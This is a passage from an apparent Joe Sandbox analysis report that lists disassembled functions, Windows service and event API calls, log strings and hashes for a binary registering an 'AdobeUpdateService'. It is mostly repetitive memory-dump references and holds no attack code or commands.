                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-1143323105
                                                                                                                                                                                                                                                                    • Opcode ID: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction ID: 0f7ac151626cc6776e72673ec142dc1ae90cb188b2ca2df04446cdc6e3645632
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C421F630740311A7CA20EF259D66F9B3654BB41B00F14017BF912A72E1CBACBD5286ED
                                                                                                                                                                                                                                                                    Function 004018B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(AdobeUpdateService,00401DB0), ref: 00401942
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004019A0
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                      • Part of subcall function 00401A30: GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceMain: Failed to register the service with Register Service Control Handler with %d, xrefs: 004019A7
                                                                                                                                                                                                                                                                    • ServiceMain: Started, xrefs: 00401922
                                                                                                                                                                                                                                                                    • AdobeUpdateService, xrefs: 0040193D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$Service$CtrlHandlerRegisterStatus
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$ServiceMain: Failed to register the service with Register Service Control Handler with %d$ServiceMain: Started
                                                                                                                                                                                                                                                                    • API String ID: 125077777-3162937321
                                                                                                                                                                                                                                                                    • Opcode ID: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction ID: a0a6ef52c26ab5d4a2a010d99244e849a5362b380fe035aef843cf64b66cd91c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25311171A40215ABE300DF6AED46B5A77A4EB55714F14423FE804A73D0EFB86904CBA9
                                                                                                                                                                                                                                                                    Function 0040B280 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B317
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B32E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EventObjectResetSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 3162950495-832234452
                                                                                                                                                                                                                                                                    • Opcode ID: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction ID: ed9a0f1cae05966dad16be02516542e9fa838564d8aed4eb53f716a594107257
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C11108317802155BEB208B599C47B5A7748EB01B31F6407BBFC69E72D0CB65AC1046DC
                                                                                                                                                                                                                                                                    Function 00403E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$readDataCallBack : Setting event for read data callback
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2675428969
                                                                                                                                                                                                                                                                    • Opcode ID: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction ID: 4701acb43a26968b7f86df0609fe2f1396b750fb55ec2d1e5461187ebc36528e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101A532780224ABC6109B59EC42A5B7B5CEF65B137140077FA09A72D0CB7ABD508BED
                                                                                                                                                                                                                                                                    Function 00403EF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,9E574B25,00000000,00000008,00000000,00497500,000000FF,?,004059AA), ref: 00403F86
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2429184316
                                                                                                                                                                                                                                                                    • Opcode ID: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction ID: 925ded1f5c256d2d7ca2cb9baee336687e69f41301eaf6f7f9b06fcd4507b0e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5593ad2a507a23b0f7cd9ec3a726937450f1b810ed9e790710a49eada20f922d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E310270740602ABD708CF15CD95B5ABBA8FF45715F10023AE609A7AD0DB7DF9508B9C
                                                                                                                                                                                                                                                                    Function 0040BB70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0040BC81
                                                                                                                                                                                                                                                                      • Part of subcall function 0046B5AE: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004C94C0,?,?,00468759,?,004C13D0,?), ref: 0046B60E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionInitRaisestd::locale::_
                                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                    • API String ID: 2020603122-1866435925
                                                                                                                                                                                                                                                                    • Opcode ID: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction ID: 1c84d52ffb255289c8c822d3fe868fb1937b2b01e66fc20b4b360ecd81d27cfb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02f188c2921aaeed174908c3ed2f8e321f5381dadfdf40a2248bed2df7ff2a08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 923104B1900704BBD310DF55C806B96B7A4FB00718F10422FE8049BAC1E7BEB5548BDA
                                                                                                                                                                                                                                                                    Function 00401770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Setting Service Status state to %d , xrefs: 00401800
                                                                                                                                                                                                                                                                    • ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d , xrefs: 0040187E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000020.00000002.2801119476.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801084067.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801216504.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801265458.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801296981.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801336588.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801664374.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801698779.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801735190.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801771222.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801806301.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801846980.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801889061.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801928115.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2801974512.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802010104.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000020.00000002.2802059687.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_32_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastServiceStatus
                                                                                                                                                                                                                                                                    • String ID: ReportSvcStatus : Set Service Status returned Error %d, while setting state to %d $ReportSvcStatus : Setting Service Status state to %d
                                                                                                                                                                                                                                                                    • API String ID: 1547514316-586121575
                                                                                                                                                                                                                                                                    • Opcode ID: b1f02e58a53d84fc7e1140356b729e7ad3c4ef579053cb0ed929bf1a68765758
